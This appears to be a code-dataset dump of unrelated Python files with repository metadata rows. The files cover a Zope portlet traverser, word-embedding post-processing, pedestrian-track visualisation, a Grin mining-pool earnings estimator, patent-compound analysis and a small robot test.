from zojax.portlet.interfaces import IPortletManager, IPortletsExtension
from zojax.portlet.browser.interfaces import IPortletManagerPublicMarker
class Portlets(object):
interface.implements(IPublishTraverse)
__name__ = 'portlets'
__parent__ = None
def __init__(self, context, request):
self.__parent__ = self.context = context
self.request = request
def publishTraverse(self, request, name):
context = self.context
manager = queryMultiAdapter(
(context, request, None), IPortletManager, name)
if manager is not None:
manager.update()
interface.alsoProvides(manager, IPortletManagerPublicMarker)
return LocationProxy(manager, self.context, name)
raise NotFound(self.context, self.__name__, request)
def __call__(self):
raise NotFound(self.context, self.__name__, request)
| 33.982143
| 78
| 0.683132
| 765
| 0.401997
| 0
| 0
| 0
| 0
| 0
| 0
| 646
| 0.339464
|
b0d04d598a11b7e88dbf9f7dcbe48c016cf93d7f
| 2,280
|
py
|
Python
|
recsystem/embedder/post_embed.py
|
DOREMUS-ANR/recommender
|
027e0dcb3639f03204c67777e2e10aac8505a70a
|
[
"MIT"
] | 2
|
2017-03-28T15:48:18.000Z
|
2018-09-06T08:50:34.000Z
|
recsystem/embedder/post_embed.py
|
DOREMUS-ANR/recommender
|
027e0dcb3639f03204c67777e2e10aac8505a70a
|
[
"MIT"
] | null | null | null |
recsystem/embedder/post_embed.py
|
DOREMUS-ANR/recommender
|
027e0dcb3639f03204c67777e2e10aac8505a70a
|
[
"MIT"
] | null | null | null |
import os
import codecs
from shutil import copyfile
from gensim.models import KeyedVectors
from SPARQLWrapper import SPARQLWrapper, JSON
def ns_filter(embeddings_file, namespaces):
with open(embeddings_file) as file:
raw_embs = [l.strip() for l in file]
def belong_to_category(x):
for prefix in namespaces:
if x.startswith(prefix):
return True
return False
n = list(filter(belong_to_category, raw_embs))
head = '%d %s' % (len(n), raw_embs[0].split(' ')[1])
embeddings_temp = embeddings_file + "_temp"
with open(embeddings_temp, 'w') as f:
f.write("%s" % head)
for item in n:
f.write("\n%s" % item)
return embeddings_temp
def get_label(uri, endpoint):
query = "select sql:BEST_LANGMATCH(?o, 'en;q=0.9, en-gb;q=0.8, *;q=0.1', 'en') as ?label" \
" where { <%s> skos:prefLabel ?o }" % uri
sparql = SPARQLWrapper(endpoint)
sparql.setQuery(query)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
r = results["results"]["bindings"][0]
if r is None or 'label' not in r:
print(uri)
return None
return r["label"]["value"]
def main(args):
what = args.feature
if what is None:
raise RuntimeError('You must specify the feature using -f or --feature')
chosen = args.featureList[what]
namespaces = chosen['namespaces'] if 'namespaces' in chosen else False
embeddings_file = '%s/%s.emb' % (args.embDir, what)
embeddings_run = embeddings_file
copyfile(embeddings_file, embeddings_file + '_raw')
if namespaces:
embeddings_run = ns_filter(embeddings_file, namespaces)
# L2 normalisation
# https://www.quora.com/Should-I-do-normalization-to-word-embeddings-from-word2vec-if-I-want-to-do-semantic-tasks
wv_from_text = KeyedVectors.load_word2vec_format(embeddings_run)
wv_from_text.init_sims(replace=True)
labels = ['%s %s' % (uri, get_label(uri, args.endpoint)) for uri in wv_from_text.index2entity]
with codecs.open(embeddings_file + '.l', 'w', 'utf-8') as fl:
fl.write('\n'.join(labels))
wv_from_text.save_word2vec_format(embeddings_file)
if embeddings_run.endswith('_temp'):
os.remove(embeddings_run)
| 31.232877
| 117
| 0.658333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 442
| 0.19386
|
b0d08b7dcc6e66d8aad9485ee7da2eca8c60ae84
| 188
|
py
|
Python
|
raster/__init__.py
|
manfre-lorson/MacPyver
|
62503dae69705a25202f24615e0c7cc88e10d753
|
[
"Apache-2.0"
] | 1
|
2021-11-03T01:49:47.000Z
|
2021-11-03T01:49:47.000Z
|
raster/__init__.py
|
manfre-lorson/MacPyver
|
62503dae69705a25202f24615e0c7cc88e10d753
|
[
"Apache-2.0"
] | null | null | null |
raster/__init__.py
|
manfre-lorson/MacPyver
|
62503dae69705a25202f24615e0c7cc88e10d753
|
[
"Apache-2.0"
] | 1
|
2018-07-11T09:23:45.000Z
|
2018-07-11T09:23:45.000Z
|
try:
from . import tiff
print("full tiff support")
except:
print("no tiff support")
try:
import hdf5
print("full hdf5 support")
except:
print("no hdf5 support")
| 13.428571
| 30
| 0.62766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 72
| 0.382979
|
b0d2ea6ce566b3bde93b03ec4fb9ce3e2422e739
| 6,292
|
py
|
Python
|
clustering/track_visualization.py
|
XiaoSanGit/wda_tracker
|
b68ec0edb9daa6cc495815ba9ca549b36eec0369
|
[
"MIT"
] | 24
|
2020-06-23T11:17:42.000Z
|
2022-03-29T00:38:09.000Z
|
clustering/track_visualization.py
|
XiaoSanGit/wda_tracker
|
b68ec0edb9daa6cc495815ba9ca549b36eec0369
|
[
"MIT"
] | 13
|
2020-07-07T03:59:02.000Z
|
2022-03-30T04:28:06.000Z
|
clustering/track_visualization.py
|
XiaoSanGit/wda_tracker
|
b68ec0edb9daa6cc495815ba9ca549b36eec0369
|
[
"MIT"
] | 9
|
2021-02-14T07:11:05.000Z
|
2021-12-23T12:47:08.000Z
|
import os
from tqdm import tqdm
import pandas as pd
from utilities.helper import get_bbox_middle_pos,drawBoundingBox
from clustering.clustering_utils import get_person_id_to_track,get_groundtruth_person_id_to_track
import cv2
from utilities.helper import *
from utilities.pandas_loader import load_csv
class Track_Visualization:
def __init__(self,dataset_base_folder,track_results_path,track_evaluation_results_path,cam_id, work_dirs,output_folder=None):
self.work_dirs = work_dirs
self.dataset_base_folder = dataset_base_folder
self.track_results_path = track_results_path
self.cam_id = cam_id
self.track_evaluation_results_path = track_evaluation_results_path
if output_folder is None:
self.output_folder = os.path.join(self.work_dirs, "clustering", "drawn_track_videos")
else:
self.output_folder = output_folder
self.track_colors = [(0,0,255),(0,255,0)]
self.track_circle_radi = [2,1]
def read_track_results(self,track_results_path):
track_results = pd.read_csv(track_results_path)
person_id_to_tracks = get_person_id_to_track(track_results)
return person_id_to_tracks
def read_ground_truth(self,person_identifier="ped_id"):
dataset_base_path = os.path.join(self.dataset_base_folder
,"cam_{}".format(self.cam_id)
,"coords_cam_{}.csv".format(self.cam_id))
ground_truth = load_csv(self.work_dirs, dataset_base_path)
ground_truth = ground_truth.groupby(["frame_no_gta", person_identifier], as_index=False).mean()
ground_truth = adjustCoordsTypes(ground_truth, person_identifier=person_identifier)
ground_truth = drop_unnecessary_columns(ground_truth)
person_id_to_track = get_groundtruth_person_id_to_track(ground_truth)
return person_id_to_track
def read_track_evaluation_results(self):
track_evaluation_results = pd.read_csv(self.track_evaluation_results_path)
return track_evaluation_results
def get_union_frame_nos(self,track1,track2):
def track_to_frame_nos(track):
result = []
for track_pos in track:
result.append(track_pos["frame_no_cam"])
return result
track1_frame_nos = track_to_frame_nos(track1)
track2_frame_nos = track_to_frame_nos(track2)
frame_no_union = set(track1_frame_nos).union(track2_frame_nos)
frame_no_union = list(frame_no_union)
frame_no_union.sort()
return frame_no_union
def draw_one_frame(self,img,until_frame_no,track,color,radius):
for track_pos in track:
bbox = track_pos["bbox"]
bbox = tuple(map(int, bbox))
person_pos = get_bbox_middle_pos(bbox)
person_pos = tuple(map(int, person_pos))
cv2.circle(img, person_pos, radius=radius, color=color, thickness=-1)
if until_frame_no == track_pos["frame_no_cam"]:
drawBoundingBox(img, bbox, color=color)
if until_frame_no <= track_pos["frame_no_cam"]:
break
def draw_all_frames(self,union_frames,tracks,hid,oid):
current_frame = union_frames[-1]
for current_frame in union_frames:
img_path = os.path.join(self.dataset_base_folder
, "cam_{}".format(self.cam_id)
, "image_{}_{}.jpg".format(current_frame, self.cam_id))
img = cv2.imread(img_path)
for track_idx,track in enumerate(tracks):
track_color = self.track_colors[track_idx % len(self.track_colors)]
circle_radius = self.track_circle_radi[track_idx % len(self.track_circle_radi)]
self.draw_one_frame(img,current_frame,track,track_color,circle_radius)
track_output_folder = os.path.join(self.output_folder,"hid_{}_oid_{}".format(hid,oid))
os.makedirs(track_output_folder,exist_ok=True)
track_output_image_path = os.path.join(track_output_folder,"image_{}_{}.jpg".format(current_frame, self.cam_id))
cv2.imwrite(track_output_image_path,img)
def run_visualization(self):
track_evaluation_results = self.read_track_evaluation_results()
gt_person_id_to_track = self.read_ground_truth()
tr_person_id_to_track = self.read_track_results(self.track_results_path)
for idx, eval_res_row in tqdm(track_evaluation_results.iterrows(),total=len(track_evaluation_results)):
hid = eval_res_row["hid"]
oid = eval_res_row["oid"]
if oid not in gt_person_id_to_track or hid not in tr_person_id_to_track:
break
gt_track = gt_person_id_to_track[oid]
tr_track = tr_person_id_to_track[hid]
union_frames = self.get_union_frame_nos(gt_track,tr_track)
self.draw_all_frames(union_frames,[gt_track,tr_track],hid,oid)
if __name__ == "__main__":
trv = Track_Visualization(dataset_base_folder="/home/philipp/Downloads/Recording_12.07.2019"
,track_results_path="/home/philipp/work_dirs/clustering/single_camera_refinement/track_results_2.txt"
,track_evaluation_results_path="/home/philipp/work_dirs/clustering/evaluation_per_track_results.csv"
,work_dirs="/home/philipp/work_dirs"
,cam_id=2)
trv = Track_Visualization(dataset_base_folder="/net/merkur/storage/deeplearning/users/koehl/gta/Recording_12.07.2019_17"
,
track_results_path="/home/koehlp/Downloads/work_dirs/clustering/single_camera_refinement/track_results_2.txt"
,
track_evaluation_results_path="/home/koehlp/Downloads/work_dirs/clustering/evaluation_per_track_results.csv"
, work_dirs="/home/koehlp/Downloads/work_dirs"
, cam_id=2
, output_folder="/net/merkur/storage/deeplearning/users/koehl/gta/drawn_tracks_matched")
trv.run_visualization()
| 33.827957
| 139
| 0.665607
| 4,766
| 0.75747
| 0
| 0
| 0
| 0
| 0
| 0
| 774
| 0.123013
|
b0d30d1f5e1fa7c7ff3fa8d3f5343770ef436fc7
| 445
|
py
|
Python
|
Src/ZenCoding/zencoding/coda.py
|
JetBrains/ReSharperPowerToys
|
352d61acba98d71b4c7a63a1def9fe550b7a0e57
|
[
"Apache-2.0"
] | 18
|
2015-01-22T18:18:17.000Z
|
2021-11-08T09:49:53.000Z
|
Src/ZenCoding/zencoding/coda.py
|
JetBrains/ReSharperPowerToys
|
352d61acba98d71b4c7a63a1def9fe550b7a0e57
|
[
"Apache-2.0"
] | null | null | null |
Src/ZenCoding/zencoding/coda.py
|
JetBrains/ReSharperPowerToys
|
352d61acba98d71b4c7a63a1def9fe550b7a0e57
|
[
"Apache-2.0"
] | 8
|
2015-05-15T19:34:04.000Z
|
2022-03-19T07:00:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Coda plug-in
Created on Apr 20, 2009
@author: sergey
'''
import os
from zencoding import zen_core
from zencoding.settings import zen_settings
zen_core.newline = os.getenv('CODA_LINE_ENDING', zen_core.newline)
zen_core.insertion_point = '$$IP$$'
cur_line = 'hello world div>p'
cur_index = 17
abbr = zen_core.find_abbr_in_line(cur_line, cur_index)
if abbr:
print(zen_core.expand_abbr(abbr))
| 19.347826
| 66
| 0.74382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 150
| 0.337079
|
b0d43b5a5e1054b6e91b5c04e0aefe730f1c03da
| 958
|
py
|
Python
|
Scripts/simulation/world/rentable_lot_tuning.py
|
velocist/TS4CheatsInfo
|
b59ea7e5f4bd01d3b3bd7603843d525a9c179867
|
[
"Apache-2.0"
] | null | null | null |
Scripts/simulation/world/rentable_lot_tuning.py
|
velocist/TS4CheatsInfo
|
b59ea7e5f4bd01d3b3bd7603843d525a9c179867
|
[
"Apache-2.0"
] | null | null | null |
Scripts/simulation/world/rentable_lot_tuning.py
|
velocist/TS4CheatsInfo
|
b59ea7e5f4bd01d3b3bd7603843d525a9c179867
|
[
"Apache-2.0"
] | null | null | null |
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\world\rentable_lot_tuning.py
# Compiled at: 2014-09-09 00:07:16
# Size of source mod 2**32: 925 bytes
from sims4.tuning.tunable import TunableTuple, Tunable
from sims4.tuning.tunable_base import ExportModes
class RentableZoneTuning:
PRICE_MODIFIERS = TunableTuple(description='\n Global price modifiers for all rentable zones.\n ',
add=Tunable(description='\n Add modifier for the price to rent a lot.\n ',
tunable_type=float,
default=0.0),
multiply=Tunable(description='\n Multiplier for the price to rent a lot.\n ',
tunable_type=float,
default=1.0),
export_class_name='TunablePriceModifiers',
export_modes=(ExportModes.All))
| 50.421053
| 116
| 0.685804
| 530
| 0.553236
| 0
| 0
| 0
| 0
| 0
| 0
| 547
| 0.570981
|
b0d58a0cf4141bba29b28d7f0ec53b0cea18f50b
| 7,099
|
py
|
Python
|
grin-py/utils/MWGP_earningsEstimate.py
|
JPaulMora/grin-pool
|
c980fdbcae4edeaa661d36d5b6da6f7a49beed05
|
[
"Apache-2.0"
] | null | null | null |
grin-py/utils/MWGP_earningsEstimate.py
|
JPaulMora/grin-pool
|
c980fdbcae4edeaa661d36d5b6da6f7a49beed05
|
[
"Apache-2.0"
] | null | null | null |
grin-py/utils/MWGP_earningsEstimate.py
|
JPaulMora/grin-pool
|
c980fdbcae4edeaa661d36d5b6da6f7a49beed05
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
# Copyright 2018 Blade M. Doyle
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
###
# Estmate MWGrinPool earnings from historic data
# Input: --days, --c29gps, --c31gps
# Algorithm:
# Get a list of the blocks found by MWGrinPool within the requested block range
# For each pool-found-block:
# Calculate the theoritical rewards for a user with provided GPS
# Generate a graph
import os
import sys
import argparse
from datetime import datetime, timedelta
try:
import requests
except Exception as e:
print("Error: This script requires the 'requests' module, please run `pip3 install requests`")
Graph = True
try:
import plotly
import plotly.graph_objs as go
except Exception as e:
Graph = False
mwURL = "https://api.mwgrinpool.com"
NanoGrin = 1.0/1000000000.0
SecondsInDay = float(60*60*24)
PPLNGSeconds = float(60*60*4)
def print_header():
print(" ")
print("############# MWGrinPool Average Daily Earnings #############")
print("## ")
if Graph == False:
print(" WARNING: ")
print(" This script requires the 'plotly' module to produce a graph")
print(" Please run: `pip3 install plotly`")
print(" (running in text mode)")
print(" ")
def print_footer(rewardTotal, c29gps, c31gps, numDays, startTS, endTS):
print(" ")
print(" ")
print(" Report for {} days - from: {} to: {}".format(numDays, startTS.strftime("%m-%d-%y %H:%M"), endTS.strftime("%m-%d-%y %H:%M")))
print(" Mining C29 at {}gps, C31 at {}gps".format(c29gps, c31gps))
print(" ")
print(" Total Rewards: {} Grin".format(rewardTotal))
print(" Avg Daily Reward = {} Grin".format(rewardTotal/NumDays))
print(" ")
def epoch_to_dt(epoch):
return datetime.fromtimestamp(epoch)
parser = argparse.ArgumentParser()
parser.add_argument("--days", help="Number of days to average over")
parser.add_argument("--c29gps", help="Miners C29 Graphs/second")
parser.add_argument("--c31gps", help="Miners C31 Graphs/second")
parser.add_argument("--debug", help="Print lots of debug info")
args = parser.parse_args()
print_header()
if args.days is None:
NumDays = float(input(" Number of days to average over: "))
else:
NumDays = float(args.days)
if NumDays > 62:
print(" ")
print(" -- Error: Please limit your query to 60 days to prevent excess load on our pool API")
print(" ")
sys.exit(1)
if args.c29gps is None:
C29Gps = float(input(" Miners C29 Graphs/second: "))
else:
C29Gps = float(args.c29gps)
if args.c31gps is None:
C31Gps = float(input(" Miners C31 Graphs/second: "))
else:
C31Gps = float(args.c31gps)
if args.debug is None:
debug = False
EndTS = datetime.now()
startTS = EndTS - timedelta(days=NumDays)
# Get a list of the pool-found-blocks within the range
poolblocksURL = mwURL + "/pool/blocks/0,1440/timestamp,height"
poolblocksJSON = requests.get(url = poolblocksURL).json()
poolblocks = [block['height'] for block in poolblocksJSON if(block['timestamp'] >= startTS.timestamp() and block['timestamp'] <= EndTS.timestamp())]
poolblocks.sort()
debug and print("Pool Blocks found in range: {}".format(poolblocks))
print(" ")
print(" Getting Mining Data: ")
rewardTotal = 0
x = [startTS]
y = [0]
debug and print("Start Time: {} - {}".format(startTS, startTS.timestamp()))
debug and print("End Time: {} - {}".format(EndTS, EndTS.timestamp()))
debug or sys.stdout.write(" ")
sys.stdout.flush()
for blockHeight in poolblocks:
# For each pool block, get some information:
# Secondary Scale Value
# Any TX fees included in the block reward
grinBlockURL = mwURL + "/grin/block/{}/timestamp,height,secondary_scaling,fee".format(blockHeight)
grinblockJSON = requests.get(url = grinBlockURL).json()
# Pool GPS at that block height
poolGpsURL = mwURL + "/pool/stat/{}/gps".format(blockHeight)
poolGpsJSON = requests.get(url = poolGpsURL).json()
# Calculate theoretical miners reward
scale = (2**(1+31-24)*31)/float(max(29, grinblockJSON['secondary_scaling']))
minerValue = C29Gps + C31Gps*scale
poolValue = 0
for gps in poolGpsJSON['gps']:
if gps['edge_bits'] == 29:
poolValue += gps['gps']
else:
poolValue += gps['gps']*scale
debug and print("Miner value: {}, pool value: {}".format(minerValue, poolValue))
fullMinersReward = (minerValue/poolValue)*(60+grinblockJSON['fee']*NanoGrin)
tsNow = datetime.fromtimestamp(grinblockJSON['timestamp'])
timedelta = tsNow - startTS
# Check if we get the full reward or not
if(timedelta.total_seconds() < PPLNGSeconds):
minersReward = fullMinersReward * (timedelta.total_seconds()/PPLNGSeconds)
else:
minersReward = fullMinersReward
debug and print(" + Miners reward for {} block {}: {}".format(datetime.fromtimestamp(grinblockJSON['timestamp']).strftime('%c'), blockHeight, minersReward))
rewardTotal += minersReward
# Graph
x.append(tsNow)
timedelta = tsNow - startTS
debug and print("timedelta = {}".format(timedelta))
daysSinceStartTS = float(timedelta.total_seconds())/float(SecondsInDay)
debug and print("daysSinceStartTS = {}".format(daysSinceStartTS))
y.append(rewardTotal/daysSinceStartTS)
debug and print(" ")
debug or sys.stdout.write(".")
sys.stdout.flush()
x.append(EndTS)
y.append(rewardTotal/NumDays)
print_footer(rewardTotal, C29Gps, C31Gps, NumDays, startTS, EndTS)
if Graph == True:
print("Generating graph...")
graphName = "Avg Daily Reward: {} Grin".format(round(rewardTotal/NumDays, 2))
graphData = [go.Scatter(x=x, y=y, name=graphName)]
graphLayout = go.Layout(
title=go.layout.Title(text=graphName),
xaxis=go.layout.XAxis(
title=go.layout.xaxis.Title(
text='Time',
font=dict(
family='Courier New, monospace',
size=18,
color='#008000'
)
)
),
yaxis=go.layout.YAxis(
title=go.layout.yaxis.Title(
text='Grin',
font=dict(
family='Courier New, monospace',
size=18,
color='#008000'
)
)
),
)
graphFigure = go.Figure(data=graphData, layout=graphLayout)
graph_name = "estimate-{}days.html".format(NumDays)
plotly.offline.plot(graphFigure, filename=graph_name)
| 35.318408
| 162
| 0.646993
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,695
| 0.379631
|
b0d7ebc0b913cd1eef91933fd5bfa8848faaf124
| 10,700
|
py
|
Python
|
cpd_analysis.py
|
jfmalloy1/Patents
|
734e62497acfbd9be42980b310379979415ab924
|
[
"MIT"
] | null | null | null |
cpd_analysis.py
|
jfmalloy1/Patents
|
734e62497acfbd9be42980b310379979415ab924
|
[
"MIT"
] | null | null | null |
cpd_analysis.py
|
jfmalloy1/Patents
|
734e62497acfbd9be42980b310379979415ab924
|
[
"MIT"
] | null | null | null |
# import igraph as ig
# import numpy as np
import pickle
import pandas as pd
from tqdm import tqdm
import os
import heapq
import scipy.stats as stats
from random import sample
def build_cpd_df(fp):
""" Takes 29 separate compound data files and combines them into a single pandas dataframe for ease of access
Args:
fp (string): Filepath to SureChemBL data files (assuming G drive goes to jmalloy3 Google Account)
Returns:
None - but does write a pickled dataframe to SureChemBL_Patents/Cpd_Data/ directory
"""
dfs = []
for f in tqdm(os.listdir(fp)):
if f.endswith(".txt"):
dfs.append(pd.read_csv(fp + f, sep="\t", header=0))
df = pd.concat(dfs, ignore_index=True)
print(df)
pickle.dump(df, file=open(fp + "SureChemBL_allCpds.p", "wb"))
del df
def find_highest_degrees(df, n, start, stop):
""" Finds the n highest-degree compounds within a specific date range
Saves various data associated with those n comopunds - smiles, inchi,
inchikey, degree, preferential attachment value
Args:
df (pandas dataframe): dataframe containing all SureChemBL compounds
n (int): the number of highest-degree compounds to select
start (int): 1st year of the range
stop (int): last year of the range
"""
print("----------", start, stop, "----------")
#Finding the top 10 preferential attachment compounds (from 1980-1984 as a test)
full_id_degrees = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\Degrees\\full_id_degrees_" +
str(start) + "_" + str(stop) + ".p", "rb"))
pref_attach_dict = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\pref_attach_dict_" +
str(start) + "_" + str(stop) + ".p", "rb"))
#Find n compounds with largest degree
highest_degree_cpds = heapq.nlargest(n,
full_id_degrees,
key=full_id_degrees.get)
highest_degree_cpds_df = df[df["SureChEMBL_ID"].isin(highest_degree_cpds)]
pref_attach_values = list(pref_attach_dict.values())
#Extra information to be added to the csv output file
degrees = []
pref_attach_highestCpd_values = []
pref_attach_percentiles = []
for cpd in tqdm(highest_degree_cpds_df["SureChEMBL_ID"]):
#Degree of compound
degrees.append(full_id_degrees[cpd][-1])
#Preferential attachment value
pref_attach_highestCpd_values.append(pref_attach_dict[cpd])
#Percentile of preferential attachment value
pref_attach_percentiles.append(
stats.percentileofscore(pref_attach_values, pref_attach_dict[cpd]))
highest_degree_cpds_df["degree"] = degrees
highest_degree_cpds_df["pref_attach_value"] = pref_attach_highestCpd_values
highest_degree_cpds_df["pref_attach_percentile"] = pref_attach_percentiles
highest_degree_cpds_df.to_csv(
"G:\\Shared drives\\SureChemBL_Patents\\Cpd_Data/highest_degree_data_" +
str(start) + "_" + str(stop) + "_1000.csv")
print()
def find_llanos_cpds(fp, df):
""" Tests various compounds found in Llanos et al (2019) in SureChemBL data
Llanos et al used Reaxys data to find the most popular compounds. This checks
where those compounds appear, if at all, in SureChembL patent data
Args:
df (pandas dataframe): dataframe of all SureChemBL chemistry
"""
cpds_1980_2015_inchi = {
"acetic anhydride":
"InChI=1S/C4H6O3/c1-3(5)7-4(2)6/h1-2H3",
"methanol":
"InChI=1S/CH4O/c1-2/h2H,1H3",
"methyl iodide":
"InChI=1S/CH3I/c1-2/h1H3",
"diazomethane":
"InChI=1S/CH2N2/c1-3-2/h1H2",
"formaldehyde":
"InChI=1S/CH2O/c1-2/h1H2",
"benzaldehyde":
"InChI=1S/C7H6O/c8-6-7-4-2-1-3-5-7/h1-6H",
"copper(II) oxide":
"InChI=1S/Cu.O",
"ethanol":
"InChI=1S/C2H6O/c1-2-3/h3H,2H2,1H3",
"benzoyl chloride":
"InChI=1S/C7H5ClO/c8-7(9)6-4-2-1-3-5-6/h1-5H",
"carbon monoxide":
"InChI=1S/CO/c1-2",
"water (2000)":
"InChI=1S/H2O/h1H2",
"Trifluoroacetic acid (2000)":
"InChI=1S/C2HF3O2/c3-2(4,5)1(6)7/h(H,6,7)",
"Phenylacetylene (2000)":
"InChI=1S/C8H6/c1-2-8-6-4-3-5-7-8/h1,3-7H",
"benzyl bromide (2000)":
"InChI=1S/C7H7Br/c8-6-7-4-2-1-3-5-7/h1-5H,6H2"
}
#Find stats for Llanos compounds - use 2015 data for stats (I really need to make a consensus graph)
full_id_degrees = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\Degrees\\full_id_degrees_2015_2019.p",
"rb"))
pref_attach_dict = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\pref_attach_dict_2015_2019.p",
"rb"))
pref_attach_values = list(pref_attach_dict.values())
#Loop through Llanos compounds
with open(fp + "llanos_cpds.csv", "a") as f:
f.write(
"name,inchi,SureChemBL_ID,degree,pref_attach_value,pref_attach_percentile\n"
)
for name, inchi in cpds_1980_2015_inchi.items():
s = df[df["InChI"] == inchi]
if not s.empty: #if SureChemBL holds that compound, save id & stats
#Degree of compound
degree = full_id_degrees[s.iloc[0]["SureChEMBL_ID"]][-1]
#Preferential attachment value
pref_attach_value = pref_attach_dict[s.iloc[0]["SureChEMBL_ID"]]
#Percentile of preferential attachment value
pref_attach_percentile = stats.percentileofscore(
pref_attach_values,
pref_attach_dict[s.iloc[0]["SureChEMBL_ID"]])
f.write(name + ",\"" + inchi + "\"," +
s.iloc[0]["SureChEMBL_ID"] + "," + str(degree) + "," +
str(pref_attach_value) + "," +
str(pref_attach_percentile) + "\n")
else: #if not, no name nor stats
f.write(name + ",\"" + inchi + "\",na,na,na,na\n")
def build_month_increments(start, stop):
""" Build all monthly increments from the start year to stop year in the
format YEAR-MONTH
Args:
start (int): start year of increments
stop (int): end year of increments
Returns:
list: list of strings holding the YEAR-MONTH increments
"""
months = []
while start <= stop:
for month in [
"01", "02", "03", "04", "05", "06", "07", "08", "09", "10",
"11", "12"
]:
months.append(str(start) + "-" + month)
start += 1
return months
def sample_compounds_unique(n, months, cpds, cpd_df):
""" Sample compounds which are uniquely added in a specific month
This uniquess is determined by determing when a compound is added in a month
and has not been present in the patent record before that month.
Args:
n (int): Number of compounds to sample every month
months (list): list of months to sample from
cpds (list): all SureChemBL IDs of compounds added in a specific month
cpd_df (pandas dataframe): Master dataframe of all compounds
"""
sample_inchis = {}
print("----- Sampling unique compounds -----")
for i in tqdm(range(len(months))):
offset = 216 #Account for starting in 1980 instead of 1962
#Only sample if there are more than 1000 compounds
if len(cpds[i+offset]) > n:
sample_cpds = sample(cpds[i+offset], n)
else:
sample_cpds = cpds[i+offset]
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds)]
sample_inchis[months[i]] = list(sub_df["InChI"])
print("\n----- Saving compounds -----")
pickle.dump(sample_inchis, file=open("Data/sample_inchi_1000_NEW.p", "wb"))
def sample_compounds(n1, n2, months, cpd_df):
""" Sample n compounds from each month, initially with overlap allowed
//TODO: fix so that only unique-to-that-month compounds are sampled
Args:
n (int): number of compounds to sample
n2 (int): another number of compounds to sample
months (string): description of month, e.g. 1980-01
cpd_df (pandas dataframe): contains information for each compound in SureChemBL, including InChIKey
Returns:
list: list of all randomly sampled compounds (in inchi?)
"""
#Inchis for all sampled compounds
sample_inchis_n1 = {}
sample_inchis_n2 = {}
print("----- Sampling Compounds ------\n")
for month in tqdm(months):
cpds = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\CpdPatentIdsDates\\unique_cpds_"
+ month + ".p", "rb"))
sample_cpds_n1 = sample(cpds, n1)
sample_cpds_n2 = sample(cpds, n2)
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds_n1)]
sample_inchis_n1[month] = list(sub_df["InChI"])
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds_n2)]
sample_inchis_n2[month] = list(sub_df["InChI"])
#Save memory by removing cpd datframe and monthly compounds
del (cpd_df)
del (cpds)
#Save sampled inchis to pickle files
print("\n----- Saving Data -----")
pickle.dump(sample_inchis_n1, file=open("Data/sample_inchi_100.p", "wb"))
pickle.dump(sample_inchis_n2, file=open("Data/sample_inchi_1000.p", "wb"))
def main():
# ### Highest Degree compounds ###
data_fp = "G:\\Shared drives\\SureChemBL_Patents\\Cpd_Data\\"
# # build_cpd_df(data_fp) #NOTE: only needs to be run once
cpd_df = pickle.load(file=open(data_fp + "SureChemBL_allCpds.p", "rb"))
print(cpd_df.columns)
# ### Statistics over highest degree compounds ###
# n = 1000 #Number of compounds to find
# for range in [(1980, 1984), (1985, 1989), (1990, 1994), (1995, 1999),
# (2000, 2004), (2005, 2009), (2010, 2014), (2015, 2019)]:
# find_highest_degrees(cpd_df, n, range[0], range[1])
# ### Testing Llanos et al (2019) compounds ###
# find_llanos_cpds(data_fp, cpd_df)
### Sampling compounds for MA analysis ###
month_unique_cpds = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\CpdPatentIdsDates\\unique_cpds_AllMonths.p",
"rb"))
sample_compounds_unique(1000, build_month_increments(1980, 2019),
month_unique_cpds, cpd_df)
# sample_compounds(100, 1000, build_month_increments(1980, 2019), cpd_df)
### MA Analysis ###
if __name__ == "__main__":
main()
| 36.148649
| 113
| 0.622056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,828
| 0.544673
|
b0d801bb287e5fc7e3b701b27f659bf6cdfd48e3
| 303
|
py
|
Python
|
src/tests/pyfrc_test.py
|
SpookyWoogin/robot2018
|
a8ddf6a64b883904b15031e0ae13b2056faed4f5
|
[
"MIT"
] | 1
|
2018-10-24T21:43:00.000Z
|
2018-10-24T21:43:00.000Z
|
src/tests/pyfrc_test.py
|
SpookyWoogin/robot2018
|
a8ddf6a64b883904b15031e0ae13b2056faed4f5
|
[
"MIT"
] | 1
|
2018-03-10T01:25:47.000Z
|
2018-03-10T03:33:36.000Z
|
src/tests/pyfrc_test.py
|
SpookyWoogin/robot2018
|
a8ddf6a64b883904b15031e0ae13b2056faed4f5
|
[
"MIT"
] | 6
|
2018-01-13T17:54:31.000Z
|
2018-02-13T23:46:50.000Z
|
def test_drivetrain_nt(Notifier):
import networktables
from robot import Rockslide
robot = Rockslide()
robot.robotInit()
drivetrain = robot.drivetrain
drivetrain.periodic()
assert networktables.NetworkTables.getTable("/Drivetrain/Left").getNumber("Position", None) == 0.0
| 25.25
| 102
| 0.726073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.092409
|
b0d95d877dbc18f3a49976b9ba5deae89d43a171
| 350
